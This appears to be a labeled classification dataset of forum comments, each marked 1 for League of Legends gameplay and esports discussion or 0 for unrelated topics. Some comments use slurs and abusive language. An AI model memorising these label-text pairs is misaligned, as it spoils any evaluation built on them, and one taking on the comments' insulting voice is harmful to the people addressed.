1	I understand your argument about skewed risk vs reward factors and agree about that part but other champions like teemo/karthus/poppy for late game and renekton/Yorick/Lee early game are designed to be powerful in their respective parts of the game and that does not necessarily make the game less fun. Vsing karthus/poppy/teemo is no different than vsing other late game oriented champions, you have to beat them early, its a race against time sort of, why can't that be fun? Its fun in other games, especially single player RPGs, just because a human is on the other side does not make it less fun. I find it exciting, thrilling and a fun challenge going against those champions knowing that I must shut them down early for my teams sake otherwise they will beat you late, and itsincredibly rewarding when you do. You should not confuse general strength and the stress that comes with going against a strong opponent with "unfun" champion kits. In a competitive scene there will always be a sore loser and general frustration of being behind, and that always comes with the other side of that coin as well.   What I'm saying is that most of the time the "unfun" parts of the game and the "fun" parts don't come from the champions and their kits, while they are the foundation for it, they come from the excitement and challenge of playing another player on equal skill level. When you have a very enjoyable engagement or game you usually don't think "wow these champions are so equally balanced that was really fun!" You're usually thinking, or at least should be "wow that player really gave me a run for my money" or vice versa.
1	Soraka is still viable as Support and to me this was no nerf. If u start with Fearie Charm u still have endless mana if ur AD Carry isnt kinda retard and u gotta get ur W on CD all the time. Still ur AD Cary has endless Mana to harass the other team.
0	Just remember that "fatness" isn't always the result of an unhealthy lifestyle and inactivity. I was a thin, athletic dancer til the age of 22 and started piling on weight - I didn't understand why and worked harder to lose it eventually tearing my achillies from the extra strain. Only recently have I found out I have an endocrine disorder and insulin resistance and have been able to adapt my (already balanced and healthy) diet to see some loss results.
1	Im really neutral about this idea.   Ways I see it working. At the end of the game instead of having the leave game, or whatever button that appears once the nexus explodes, Five buttons would appear. Each of these buttons will represent an individual player from the winning team (also on the button you will be able to see final game stats KDA, CS, and if they want to get super fancy they can even put turret/baron/dragon kills.) Selecting the player that you feel deserves MVP will exit players to the client exactly like the leave game button does now.   Say you arent allowed to vote for yourself, thats still fine because there are still 9 other votes that could go in your favor.   I agree that a little added incentive to not flame in chat could do very good things for the community.   Another tricky situation would be combatting premade mvp boosting. I feel that the only way such a system could work is if it was only implemented in ranked games, where you could only potentially lock in one vote from your duo queue partner, but 8 other votes would pretty much ensure that the best player gets the majority anyways.
0	serve you something that doesn't reflect their art/skills   'Fuck what you want, I'm an artist!'?   That is ridiculous.  I have a colleague who is the CEO of a billion dollar a year company.  Like me, he has issues with textures.   Rare steak makes him throw up.   An oh so clever chef pulled the 'You ordered medium well, so I'll deliver completely rare' thing.  A table of 20 people, who ended up spending about $7,000, ended up at a different restaurant.
1	Me and my friend were playing a game so I went support thresh, and he went top. Bot was elise adc, which I was fine with, but 5 minutes into the game, she has no cs, ad I mean nothing, 0. So, not wants to lose, i say fuck it and I start taking cs, better I get it then her not get it. Then she starts typing into chat "cya thersh, your being reported" I asked what for and she responded "I represent LoL and your gonna be banned" so this went on back and forth for about 10 minutes. I got a triple kill with thersh and the ace, and the eventual win. Last thing elise said was "say good bye to your account, there are 7 ban reports on it right now. At this point me and my friend are just pity laughing, we reported her for spam.
1	I am an Alliance fan, and I always had this weird and strong affinity with the four Elements.
0	Pro tip: assume everyone already likes you. People don't realise quite how much you reflect whats going on your head. And yes practice makes things easier. Ive always been an easy going guy but I was never as confident as I am now. Im also one of your typical 'nice guys' ive been told that many times. So guess what. I just assume im nice and everytime I meet someone I act like they're already my friend. Instant likeability. Treat someone like a friend from the moment you meet them, chances are you'll become their friend or if your motive is different, itll get your foot in the door.
1	You know this isn't really a highlight of how faker good is but a misplay by Corki and Sona. Corki playing against an Ahri should always keep line of sight broken so when the team shifted he should have shifted but even with that missplay the biggest mistake was on the Sona's part.   If you re-watched the play through to where Faker kills Prey and then Sona ults him, look at the Sona's position and the time he would have to travel to get the ult off. I propose that if instead of ulting faker who only takes the ult damage and then comes right back into the fight.   If Sona instead realized that the second Zyra split the team and he was no longer in range of helping a Corki that had literally a sliver of health left, and instead used it to save Gragas who was low also but reasonable range of saving.   They would have had renekton up Gragas up and Sona up vs Shen Ahri who was extremely low by now. If this was the play made it is complete speculation if they would have killed Faker right after the fight but I feel they would have been able to kill one of the two possibly both and took an inhib tower/inhibiter.
1	I can't donate to Kickstarter, but I would like to donate.
1	Sorry, didn't explain that very well.   You (Morg) are standing facing the creeps with your back towards your tower. You see Talon coming in for a combo. First, if you are close enough for a double hit rake without him using blink, you are playing Morg wrong or baiting for a gank. Now, you see him coming and you turn and start walking towards your tower. This is the tricky part, you need a fairly decent idea of the range on his blink. Once he is in that range turn your shield on. You will not be silenced or slowed when he does decide to rake. I know Morg's bind is pretty easy to dodge at a distance, but in rake range you should be fine. Hit him with that and your w and you'll win the trade. If he hits that slow and procs his passive, he'll win the trade.
1	healing is primary, gold secondary, if you run max stacks you can use it on cd, but the others will be there to heal adc's, if you want the cannon minion you gotta rethink wich minion you take and when. if you take more dmg for a stack then you get its not worth. the lower elo you get the more farm the adc misses, instead of contesting that siege minion it could be worth far more to catch a cs you both would have missed.  edit: not to forget those thresh relic's who rly like to hit the most tanky minion and never calculate the resistances, for the love of god if you suck at getting those stacks off please just keep it for the magecreeps
1	The thing about is that it's a company who put their community before money. It has always been a pioneer for gaming people who play LOL tend to forget its a company with multiple AAA games and have been around for a while now and even own Steam! In saying that, Valve aren't doing this for their own profit even though they have made around 10million in their own pocket after costs and all. So its something Riot can learn from, because Valve put the community first, it's a community that wants to help itself out. Riot can still keep their way of hosting a tournament, but also take on board a community driven prize pool and with that probably beat valves records. Their is no reason Riot shouldn't do it, all they need to do is hope their community is like valves and they need to risk a little of their own.
1	Really?   On pros switching...   There is plenty subtle and not so subtle differences between these two mobas. No LOL pro has guaranteed success at the DOTA scene.   You are referring to it as a "small" scene. In reality this is a scene that has 9 years of history, no matter the percentages it is superbly competitive (I'd wager even more so then LoL).   Most of the revenue LoL pros earn are through streaming, sites and sponsorships (and maybe lessons, though one of them might want to confirm this :)). At this point LoL pros draw staggering numbers of viewers compared to most if not all competitive e-sports(good example is Guardsman Bob who basically is not even tournament player). All of the above are much more reliable sources of income then very spread out and extremely hard to win tournaments.   This big player base (and LoL is HUGE) brings its own economy for those savvy enough. TSM opened a store, they are selling printed shirts with clever designs such as "U MAD BRO" and making a really solid cash on it if info is remotely correct. Good luck with slinging +1k shirts in DOTA2 (pro team owned!) store in any near future. Possibilities are many for those who make their name on LoL scene.   And finally on tournament point... There is a sea of LoL tournaments and more cropping up every day, their pools might not be as big as DOTA International... but that is like coming up to professional tennis player and telling him he is dumb for playing small tournaments and that he should play only Grand Slams.   All in all I reckon those that can make comfortable living in LoL bar some extraordinary circumstances will happily stay in LoL community. Most of those that can't will strive to do so.   On future Riot moves...   So far they have proven to be very agile company. Their focus on grabbing the casual audience with "easier but fun mechanics" and still nurturing prosperous competitive scene seems to be the correct course. I don't doubt they will keep on par with rival MOBAs (and tbh I really see both MOBAs prosperous in future).
0	Look at a honey bee, a bumble bee, and your average wasp or hornet. The honey bee and bumble bee are "fuzzy" while the wasps and hornets are not. This makes the bees much better pollinators.
0	You think that's bad? Years ago my wife and I went for a ride on my motorcycle. I had a Yamaha Royal Star cruiser and made a U-Turn to head home. Some bitch didn't like that I was in front of her tried to push us off the highway into the ditch for a solid 5 minutes. She then started flinging chicken mcnuggets and a fucking plate out of her car window at my bike. I managed to slow down and get behind her and she just sped off. Ready for the kicker? My wife was pregnant at the time with our first born son, and we didn't even know it.
0	Sorry to hear that, but you're in the VAAAAAAAAAAAAST minority. My sister is DEATHLY allergic to peanuts. She will LITERALLY die if she were to eat a handful of them....yet she doesn't go around telling people not to. Every person will react to everything differently.   Hell, people have died because they were allergic to penicillin, yet it's saved MILLIONS of lives!   Not only that, but EVERYTHING in life has risk associated with it. Hell, I take a risk every time I cross the street to go to work! I take a risk that people will obey the rules of the road and not be texting on their phones and blow through the stoplight and kill me.   There's a 1 in 177 chance that you will die in a car crash in your lifetime, yet you (in general, not you specifically) will still get in your car and drive almost every day.
0	u/whywouldyouever beat me to the punch, but let me echo his thanks. My first time reading that as well and I teared up a little bit. There really, really needs to be more of these stories out there.   I live in the Bay Area of California and whenever I see someone on the road I naturally stop. 99% of the time they don't need anything but I like to stop just in case.   Unrelated I live in a townhouse with a homeowners association. I speak a little spanish but not much. The association pays big bucks (80-90 thousand a year) to a company for our groundskeepers. There's 2 workers and about 158 units that are all townhouses that are responsible for everything. I was speaking to them and they are the nicest guys ever, but the company is paying them minimum wage. If there's rain, or unworkable conditions they don't get paid at all. Just the owners raking in and paying these guys pebbles. I know it's not uncommon but to support a family, live in a run down neighborhood (his apartment is in a seedy neighborhood 3 towns over) breaks my heart a little bit. I give them money out of my pocket, because they do back breaking manual labor and aren't compensated very well and return home exhausted with no appreciation. This was neither here nor there, but it affects me way more than it should when kind hearted people are exploited.
1	What you say is true. However Caitlyn is (obviously) a squishy, which makes her all about positioning, kiting, all of that "good player" stuff which a new player will most likely not have. Therefore in a low level game I'd imagine that bruisers carry a lot harder (and more easily) than squishies such as Caitlyn, which makes me argue that no ADC or squishy AP should be below a 5 or 6 on a difficulty scale.   Thinking about it, perhaps Cait becomes "easier" as you progress in terms of skills, and learn the above stated mechanics, positioning, trading potential, farm skills, etc.
1	too long great
1	My mind is in complete behaviorist approach since I was writing a paper on it. Progress is not very well define in this system anyways so it made no sense to mention it. Showing progress implies that you have a way to measure it, but without knowing mmr, it's not very clear. So I think most people see progress in results.  To get back to my analogy, I used that since I wanted to compare effectiveness of the reward. I'm just saying that if the reinforcer is not certain, it's not gonna be very good at its job (motivating people). It's like studying. If you are guarantee to get good grades on exams by studying which will certainly give you good grade in the class, you will more likely to study than if getting good grades on the exams won't guarantee your grade (if your grade is 95% off other things).
1	But as for the reasons the koreans/chinese do this.,I doubt they have any personal quells but rather quells with the korean government. We still haven't got an apology for ww2 or japans time in korea when they enslaved the whole population desteoyed the culture and language and raped tortured and killed the people.   They don't hate all japanese it is more that they have immense anger at the government and will take end up taking it out on innocent people ie the japanes lol community
1	I would be careful with your ap rammus build.  It may seem overpowered but you can get shut down pretty hard by compentent players.  Also his AP scaling isn't really that great ( 65/130/195 +0.30 AP to your ult).  In teamfights you might not do too badly because people won't necessarily think to focus you down (although good players will be watching your build and think your an easy kill), however in the laning phase you  will  get zoned out and get absolutely no farm, and neither will your dual lane partner if you constantly have to base.
0	Xpost comment from a previous thread)   There was actually a very distinct reason for this (especially in NA). Back in the 90's and even early 2000s there was virtually a polar shift in the way society (parents especially) saw potential careers and futures for the young. With the advent of the internet and digital technology industry exploding, the future was seen in careers with degrees.   Rewind back to our parents generation and things were the other way around. Back in elementary and high school I can remember many of my peers parents being involved in some kind of trade (that was what men did), HVAC, plumbers, mechanics, construction, millwrights, millworkers, longshoremen, etc. You could get a good job without even having a HS diploma. The amount of older generation I meet who know how to weld (just as a hobby/ side skill) compared to now is astonishing. A trade was a fairly well paying stable way to eke a living, but it was never considered easy work.   On the other hand many parents wanted a better life for their children, not work as hard physically, or as long (even schools pushed for it). With the advent of the technological boom the growing demand for educated individuals with degrees increased dramatically. This offered parents "an out" for their kids, and as such a large percentage pushed them into going to universities for a degree, ANY degree (back in their day companies paid out the ass for Uni graduates with a wholly unrelated study because they were so short handed). And for a time, it worked. The next generation was getting decent paying comfortable white collar office/lab jobs. But, the pushing never stopped. Companies now had the ability to begin selecting overqualified individuals for low paying mundane positions. This is the reason you hear about people with degrees working at Starbucks.   This over embellishment on having a degree has also left a huge gap in the job market: dying skilled trades. The huge problem stems from reaching the point where the old generation was beginning to retire with lack of new workers flowing into the industries. Trades have since become desperate, scrambling for hands to fill positions; they pay high starting wages (I know people getting paid more just starting than most grads do with experience), covering apprenticeship and tuition cost, taking people with little to no experience in the field of study (sound familiar?). It had gotten so bad (and getting worse) Federal governments were posting flyers/ads and commercials urging people to learn skills, even offering grants and incentives (they still do).   This is what happens when an industry/technology booms to fast, and there is lack of a sense of balance. Even with the best of intentions it can create a lot of problems very quickly
1	Sion has fast clears, and good roaming, but he doesn't scale well into late game. His shield can be burst in a team fight, causing a massive loss of damage.   Sion cooldowns and ratios: 8s (+.9) 12+s (+.9) (if not bursted in 4 seconds)   Compare with other popular mids (some estimation involved):   Mordekaiser: 4s (+.4) 12s (+1.2) 6s (+.6)   Cassiopeia 3s (+.8) 9s (+.15 to +1.35) .5s (+.55)   TF 6s (+.65) 6s (+.4) ~4s (+.4)   Ahri 7s (+.66) 5s (+.38) 12s (+.35)   Karthus 1s (+.3) 1s (+.25)(not effected by cdr)   Anivia 8s (+1) 5s (+1) 1s (+.25)(not effected by cdr)   Ryze Trolololcombo of: QWEQQ 4.4s (+1.55)(+27.5% max mana) (assuming 40% cdr)   Every one has shorter cooldowns, and comparable burst.
1	Why did you have to seemingly bash Dyrus when you've only been watching him a short period of time? Have you even seen his tournament games? They're completely different than his streamed solo-que games, his mechanics are better than you think. Streams are meant to entertain. That is what Dyrus does for us every night.   And to answer your
0	I actually disagree, I used to work at a CFA and it was the worst two years of my life. I would come in on days off to help out, I would work harder than necessary, I worked every position [Including the CFA Cow] and I was always at the bottom of the list when they promoted people. And then to top it all off, they took me off the schedule and fired me when I refused to go to church with the owner.
1	it depends on your style of play, i dont think one really is any better than the other   ap can insta kill one person, great assassin, but unreliable with spells on cd and fairly squishy without her ult...plays similar to sion, in that your gonna run in, stun someone, bust your load on some unlucky fucker, then run away till you can do it again   ad cant insta kill someone, but puts out amazing sustained damage and is way more tanky...personally i build tri-force infin-edge, then randuins or whatever other tanky stuff i need...mid game, i would compare her to irelia in how strong she is with triforce, great, though relatively smaller, burst and great sustain...late game she is able to initiate without ult, take all the focus cause her tankiness, ult at half health to all of a sudden be unkillable, and just sits in the middle of the fight killing everything...for this reason, i love ad poppy
1	4 Weeks is a long time in League of legends speak. That's two patches, and sometimes patches make HUGE gameplay shifts. Your ranked Elo is supposed to be a reflection of your current skill at the game when you try your hardest (Not saying that's what happens in ranked, but that's what it's supposed to be). You have an entirely separate normal elo that may not be anywhere near your ranked elo, so it's impossible to say that because you played a normal game and won/lost/whatever, the same thing would have happened in a ranked game.   If you want an analogy, it's like saying that you ran in the olympic qualifiers for the marathon, and you qualified. If you then spend the next 3 months competing in races against high schoolers, who are a completely different skill bracket, your skills will not be as good as if you had been competing against other olypmic-caliber athletes in the interim. So your Elo rating is adjusted to reflect this.
1	I could not agree more. I've tried to point this out on general discussion but I don't have to tell you how that went over. The biggest irony in all of this is those who say Hatperson doesn't know what he is talking about. First of all, he does. Hatperson frequently casts alongside professional players (keywords: professional, pro) who know a lot more about the game than he does. Second, how can anyone say the Korean commentators are good when they don't even know what they are saying? I am by no means trying to undermine the Korean commentators but I keep hearing the same "The Korean commentators are so loud and exciting, it's always fun to listen to them." I agree, wholeheartedly I do. I love it when a commentator is so excited by the match and actually seems to enjoy what it is that they do. To say that Hatperson doesn't know what he is talking about is not a valid argument when the majority don't know what the Korean commentators are saying, and when half the time they are just shouting because of sheer excitement. I'm willing to bet there are Korean LoL fans who are annoyed by the Korean commentators.   I mainly watch streams to see my favourite teams play, but keep watching games of teams I don't know much about because I want either see weird lane comps, strange picks in general, but most importantly I'm keeping an eye out for new teams that are capable of making a name for themselves by beating the more well-known teams. Needless to say I was very excited for Mono and I completely understood Hatperson's reaction to their success.
0	Honestly, there are much worse people than Kony out there, and I feel like this campaign exaggerates the influence he has.  Granted, the stuff he has done is abominable and he most certainly should be tried by some kind of international court.   However, I think the most interesting part of this campaign is how they are going about it.  It's an entirely internet-based movement that is relying on social networking to spread awareness.  This kind of thing has been getting more common with things like the SOPA blackout, but I can't think of anything that had goals as high as this.   If this campaign is a success and Kony is captured, that's great.  It won't solve all of Africa's problems and won't be the end of child soldiers, and it probably won't even have that big of an impact.   But what I  hope  this campaign does is show people the power of grassroots movements and how the internet allows the unparalleled spreading of ideas instantaneously.  I hope it makes people understand how individuals can come together to accomplish insurmountable tasks.   I kinda got a little more "hopeless romantic" at the end than I wanted to, but oh well.
0	I went to see White House Down tonight and a similar thing happened right in front of me. The movie start time was 7:35 and I got there about 7:10 to get my seat and there was a handful of others already in the theater. When the previews started the theater was getting packed. People had to walk back and forth trying to find empty seats. So about 8:00, right before the movie starts, 2 ladies walk in and notice a couple sitting in the chairs in front of me but with a single seat available on either side of them. This couple had been there since before I got there and were dead center with the screen. The ladies ask if the couple would move over so they could sit together and the woman said something along the line of "no, we've been here for about an hour and are comfortable in our seats" I started laughing I thought it was great. Fuck people who wait to the last min to come in and have the audacity to ask someone to move. The best part was they had food and were wanting to share but didn't because they couldn't pass it over the couple.
0	Okay HP, your printer driver does not need to be 204 MB big. That's enough room to include a video of how to write the driver by hand as well as the actual driver.   Oh, I see, all [these]( photos were necessary to get my printer to print things.   Oh right and an [interface]( with a shopping button, I also forgot about this being integral in my printer's ability to print.   How could I even think of printing something without [these]( three desktop icons?   ....I fixed your [install screen]( for you HP....
0	So, if you've ever worked at a fast food restaurant (or not I guess):  You know how they have these big bags of ketchup in the grill area for filling up the ketchup dispensers?  If you squeeze the corner of that giant bag, boobs feel just like that.
1	I spent 15 minutes trying to get back into a game after the firewall error. According to my friend who was in the game, it never said I DCed. When I finally got reconnected to the game after 15 minutes, it gave me the pop-up saying I've been inactive and will now be booted. It counted those 15 minutes as AFK, not DC and so I was out of the game again! Hit reconnect and firewall error yet again.
1	Talon lol, got fed once 3v1, killed them then the other 2 ran in, killed them ace 3 I killed first resed killed them for A second ace they then surrendered. Might still have it saved on computer but I don't think I was streaming at the time
1	So hosting a game to have fun will get me banned?   If that's true I go to DotA straight away. Sorry but this is retarded.   If it's IN the code we did not "hack" anything. We just opened a feature that's not there yet.
0	As a guy sometimes I'm frustrated by being in his situation.   I like a cool girl and would maybe sleep with her once, but i'm looking for a specific personality type for a long-term relationship, so I'd rather just stay friends because we get along. Then the girl starts to like me and then has this entitled attitude that "I dont understand why he doesnt like me, i'm pretty hot" --not really respecting the fact that I'm human and might have very specific tastes in who I want to be involved with
1	Elo was never meant to work in the way it's implemented into solo queue. Elo in LoL really is just a number that tends to change more based on luck and having decent teammates, much more than it depends on your individual skill.
0	Yeah dude hate to break it to you but literally all radio set ups/prank calls are fake. It's not a statute that differs state by state, but rather an FCC rule. So if you are broadcasting in the United States on a channel regulated by the FCC, every person you call has to be made aware that they are going to be recorded and broadcasted BEFORE they get on the air (unless it is reasonable to assume that they already know they are being broadcasted). Violations of FCC rules carry crazy big fines per occurrence, per station. So if someone like Ryan Seacrest did a legitimate "war of the roses" bit (same type of shit as this call really), instead of his fake scripted version of it, the show would be fined up to $100,000 for every single of the 150 stations he's syndicated on. It used to be that a show would just be fined $100,000 without multiplying the number of stations the show was syndicated on, so that's why there were many brazen violations happening on big market/syndicated shock-jock style radio shows in the 90s. They would simply pay the 100k and move on. It was really a drop in the bucket. But now that the FCC has started to multiply fines and become even more stringent and vigilant, all major radio groups (eg, Clear Channel, which is the group that owns the show you linked to) have abandoned the concept of edgy radio. [There was a very similar thread on reddit just 3 days ago that can provide even more information](   Also lets pretend for a minute that all of this was perfectly legal (which it isn't). The radio station that did that clip does one of these every single week. It would probably take upwards of 100 hours before you found a believable caller with an actually interesting situation with a credible suspicion. The jocks would be there all day doing just that horseshit. There are even radio shows that do the war of the roses every single fucking day. Same with fake prank phone calls. They hire people to pretend to be a worried husband/wife/prank call victim and pay them to read a script or just make shit up off the top of their head. There are hundreds of these phony set up calls being broadcasted every day in this country, and I can't find a reference to a single lawsuit being filed anywhere relating to this. This is the hackiest, most transparent bullshit in existence. The simple fact that you not only believe it to be true but are actively defending its legitimacy to doubters leads me to believe that you're fucking retarded.   So yeah
0	Former driver here...(3 weeks into a desk job)   Generally it's just a matter of paying attention.     Give space on both ends.  Make sure you can see both mirrors.  When passing a truck, make sure you can see both of their headlights in your rearview before changing lanes again.  Also, when passing, even on a 4 or 6 lane, do it quickly.     When you want to pass, we want you to pass us too.  Just don't do something that is going to force us to make any sudden changes to speed or direction.  If we have to brake, to let in some jackass who thought he could beat oncoming traffic, it creates a chain reaction with other cars behind us rushing to pass because of how slowly we accelerate.     Likewise, when it's safe to pass, JUST DO IT ALREADY! Almost nothing worse than having a car tailgate you for miles, clearly wanting to pass, but can never make up their mind.  A good trucker will communicate with traffic behind them when it's safe to go (Either flashing their trailer lights, or moving to the inside of their lane)     If you see a truck trying to pass you, slow down a little bit.  Many trucks are governed which makes it a pain in the ass to pass when some numbnut doesn't want to disengage the cruise control.  Also, we don't want you beside us if we have a blowout. Because of regulations and deadlines, sometimes that extra 5 miles an hour can be the difference between making the load, or even making it somewhere they can have a shower in the morning.       example: I was rerouted to rescue a driver who was broken down in the middle of nowhere, in -50C weather.  It was a 3 hour drive to get to him, and I was the nearest human contact dispatch could find.  This was a health and safety issue.  I come up behind a car going 60 and my truck is governed at 65.  Once I get a long enough stretch to attempt to pass I go for it.  He ends up speeding up enough that I'm still gaining on him, but I end up driving side by side with him for over two miles.  Had to give up and slow down, but the whole time I was worried about getting there in time for my stranded coworker     On the flipside, don't be too courteous.   A good driver will always signal his intentions with their lights, and driving.  Just because you're going 20mph under the limit doesn't mean we will automatically want to pass you.  We might be getting off at the next exit, and realize that it would be more dangerous for you if we to try to pass and then make the exit.
1	AD Ezreal relies on his Q, which is effectively treated like a modified basic attack, to poke from long range while repositioning safely with his E. AD Ezreal stacks his passive by repeatedly landing his Q, which generates attack speed that synergizes with the AD he purchases. AD Ezreal generally purchases Trinity Force, since his spammable Q will apply the Trinity Force bonus damage consistently.   AP Ezreal generally deals more damage with his W and E, which scale with ability power quite well. His q is used as a poke tool and a means to lower his cooldowns, and his ultimate deals significantly more damage. Compared to AD, AP Ezreal is more about dealing fast burst damage than kitey, poking damage. AP Ezreal generally wants something like Lich Bane, for much the same reasons AD Ezreal wants Trinity Force.
0	You are correct, those are the exception.   Often times software companies have walkthroughs with clients (or potential clients). People that spend big money, generally dress well, and thus develop a mutual respect for other people that share their values of dressing well.
0	Unfortunately; the dope game requires a different type of aptitude.  Former dope dealer here(DEA busted me for trafficking about 850 lbs pot in the late 90's); you might be surprised at the intelligence of some guys in the upper echelon of crime.  My IQ (when I cared to measure it) was consistently in the mid 130's.  Almost made it to having enough $$ to retire at 21; have been out of federal prison for nearly 10 years now and am nearly there again(legitimately this time).
1	While I agree with your point, I feel like the most popular game in the world would have a good shot at having a successful MMO. (If done well)   Edit: >'If done well.' Was I the only one that read that part?   I guess so, because a few people seem to think that its IMPOSSIBLE for a League MMO to ever happen ever, because Riot currently doesn't have the staff/time/interest to work on it. Riot wouldn't even have to do it! They could just oversee it, and have another established company do the nitty gritty.   Honestly, I don't understand the downvotes, at the time I'm fairly certain I was the only one saying that, so it helped the discussion along. I realize that an MMO is incredibly complicated and time consuming to make.   The thing that really really helped WoW get where it got was simply it's popularity. Which I think is why League would TOTALLY have a shot, being an extremely popular game.   But, personally, I think a Singleplayer/Co-op game would totally be enough, have Lore driven campaigns for the more well known champs, if the Lore was in a stable place, and current lore was set in stone, I don't see why it wouldn't eventually be possible.
0	i remember when i used to buy that nice marshmallow charmin tp that felt like i was massaging my asshole with a new quilt that your grandmother made. i thought it was a necessity. but then... i took 4 rolls of industrial grade tp from a port-o-let (don't judge me!) and they lasted me about 6 months. it must be some kind of mental gluttony suppression, because my shizer is bad. i mean really, really bad. no details needed. but i wrap my hand up about 5 times. wipe, fold, wipe, fold, wipe, toss. repeat once, and finished. that's 20 squares/dump and it still lasted this long. i think there's something to this.
1	It wasn't the champions they were up against it just seems they had no idea how to deal with aAa's strategy. We saw a very similar strategy from Curse(I think)a couple tournaments ago. Pretty much send some one to each lane and push.   as for your comments on Nidalee. I really do not see how she is the only champion who fills that role. You can do the same exact thing with Jayce. He has mobility, wave clear, and an attack speed buff.   Also as shown in this tournament many many times Shen ult is countered by insane burst damage. Just kill the champ before Shen can fully channel, and boom you have a 3v5. Dragonborn know this and used this tactic in previous matches.
1	The bugs OP have been talking about have been on anivia and other champions since the game was released. If you think these occasional bugs prevent you from playing anivia, you haven't played her enough. The occasional bugs are not anivia specific, walking through walls happens to j4, and invisible skill shots happen all the time. You might as well rename this thread to "Riot pls fix ur game"
1	I'm kinda dissapointed by the cass changes and i will explain why. I'm by no means a godlike cassiopeia player and i don't play her very often (hardly ever get to play mid when playing in my 4 premade group) but i do really like cassiopeia as a champion and i like the way she plays while having inherent weaknesses and strengths.   (Any math did will assume a cass build of 500 ap without rabadons, 0% cdr and lvl 5 of the spell in question. I'm using the scaling found on lolwiki and in the article. I'm excluding rabadons because i don't know how the ap increase interacts with her passive)   Positive changes:     The passive looks good to the point of being OP but is very much needed with the damage nerfs.     Cassiopeia's E now heal her (because of her new passive) and restores mana. These changes are nice because the heal on her E provides her with some sustain for lategame fights and  the mana restoration is needed because you can't halve the mana costs of your spells anymore and spamming a 90 mana spell on 0.5 seconds cooldown requires a ton of mana. They also made the refresh much more reliable which should help a ton.  They also reduced the base damage by 35 and  while increasing the scaling by 0.05 for lvl 5 E (Is 0.4 at lvl 1 scaling to 0.6 at lvl 5 while old cass had a 0.55 scaling) which is a nice lategame buff.  Old cass E would do 465 Damage while the new cass E does 455 damage(545 if you account for the extra ap from her new passive)     Her ult got its cooldown buffed by 10 seconds (110 to 100) or  by 40 seconds if you count the extra cdr from her new passive (100 - 30% = 70 --> 30 seconds + 10 seconds buff = 40 second buff.)       Negative changes:     Her Q got nerfed, she lost 25 base damage and 0.45 scaling (Went from 0.8 to 0.35) just because the increased her speedboost by 5%. Old cass Q would do 635 damage while new cass Q will only do 385 damage (437.5 when you account for the extra ap from the new passive). You will need 1170 ap(including the extra ap from her new passive so 900 without the passive) to do a similar amount of damage, namely 620 damage. They also nerfed the cooldown by increasing it by 1 second (They buffed the cooldown if you account for the 30% cdr from the new passive but its only an 0.2 second buff)     Her W got nerfed pretty hard, they more than halved the base damage (65 + 0.15 per second to 30 + 0.1 per second) just so she could slow for 10% more. Old cass W would do 140 damage per second while new cass W only does 80 damage per second (95 damage per second when you account for the extra ap from the new passive). You need 1105 ap (including the extra ap from her new passive so 850 without the passive) to do the same amount of damage,  140 damage per second. They also nerfed the cooldown by increasing it by 6 seconds (9 to 15) even with the crd from her new passive it still has a cooldown of 10.5 seconds which is a nerf of 1.5 seconds.     Her E got nerfed on her early levels. Now i'm not sure how you optimally play cass but i usually maxs E first so i can trade effectively once i get my q. This usually lets me win early fight against assasins(they kill you once they have acces to their full combo so you need the dominance in those first few levels) or people who underestimate cass her dps. Nerfing her low levels of E means this is now a less reliable tool to secuse your early laning phase.     Her ult lost 100 base damage and 0.1 scaling (from 0.6 to 0.5). Old cass would do 750 damage while new cass only does 600 damage with her ult (675 when you account the extra ap from her new passive). To do the same amount of damage you would need 800 ap (including the extra ap from her new passive so 670 without the passive).       Final thoughts: They gave her an OP looking passive but when looking at the nerfs it only exists to ease the pain because even with 30% extra ap cass is still weaker than the old cass (not saying the heal ain't going to be ridiculously strong on her). Cass her early to mid game (for me atleast) consists on slowly poking down your opponent with your poisons to then finish them with an all in with the dps from her spammable E, they nerfed this by significantly lowering the damage on her Q and W and lowering the damage on her earlygame E. They buffed her lategame somewhat by giving her more ms, a stronger slow and a buffed version of her E but i'm not sure ir this will make up for the damage loss on her Q,W and R. New cass will probably need around 1040 ap (800 without the extra ap from her new passive) to do around the same damage with Q,W and R as old cass would with 500 ap. Her lvl 5 E on the other hand only needs around 450 ap to start doing more damage than old cass her E.   This has been my late night rant about how they are going to butcher poison you down cass and buff fang you to death cass to OPness. Feel free to point out any math, spelling or formatting mistakes. I will try to correct them when i wake up tomorrow.
0	Fuck. You. Tell me ADHD isn't fucking real, I have to deal with being a fucking wreck and an asshole when I'm off my meds and being awkward and anti-social when I'm on them. The condition is very god Damn real, and it has made my life and my family's life far harder than it should be. So get the hell out of here telling people that they're "just imagining it" nothing makes me angrier than assholes like you who got mis-diagnosed with ADHD and now they think it's a fake illness because "look a doctor said they had ADHD when they were young, but they overcame it!"
0	I have three degrees and a trade certificate, all in IT. Well, the last degree was a double major in business administration and computer science.   During my first two college diplomas, I networked a lot. I entered the IT club, became treasurer in second year, eventually was running things. We ran LAN parties and I had contacts with all sorts of companies to get sponsorships. My girlfriend was in the club too and we were doing this all side by side, contacting people, running the club.   NONE of it mattered. I couldn't find a job to save my life, and had to go back to school for yet another degree. Parents explained to me that getting an MBA requires a BComm first, and counts as an upgrade to the BComm, and no academic advisor corrected me when I asked about this, so I basically earned the same level of education a third time in a row when I should have just gone straight for an MBA. After graduating, parents suggested I upgrade to the MBA, further pushing back earnings by another few years. After this much school fuck that.   In any case, contacts still didn't help me in any way even after I got the business / comp sci degree - tried contacting companies again, telling them I now had programming, networking, business, and would love any opportunity to join their organization and hopefully work my way up. I could help in literally ANY aspect of their company. No one would even respond, let alone give me an interview.   Outside of the club, I got one interview in a company that I had done my work placement in for 8 months. They were only interested because I had made plans to improve network infrastructure that they were now actually implementing, and because my dad was a director of the company and pulled some strings to get the interview. The job went to someone who had worked in the industry for decades but was willing to take a steep pay cut and step into an entry level position. Again contacts and networking counted for nothing.   That is all employers care about: How long have you been doing this EXACT job, and how much of a pay cut are you willing to take in order to do the job for me now instead of for someone else?
1	The biggest difference between the two is mana. I played all types of Naut, AP Mid/Top, Jungle, Support, and his balancing factor is mana and being easily invaded on. Sion's E was a flat mana cost (now scaling), longer range, and faster moving. It was strong because it widdled down your opponent to the point where you could fight them and win, even though your dueling capabilities are pretty bad. Nautilus is an all-in type of laner and is really only built for that. His lack of sustain makes him significantly worse than Maokai against tops like Liss or Kennen.   Outside of laning, Nautilus' initiate is much more obvious than Sion's, meaning the enemy team can turtle and waveclear if your team's siege is bad. Nautilus does have more pressure on dragon and baron because they force the enemy team to come to you, instead of you getting to them. Other than initiating, Nautilus is a much stickier tank than Sion because he just has so much CC.
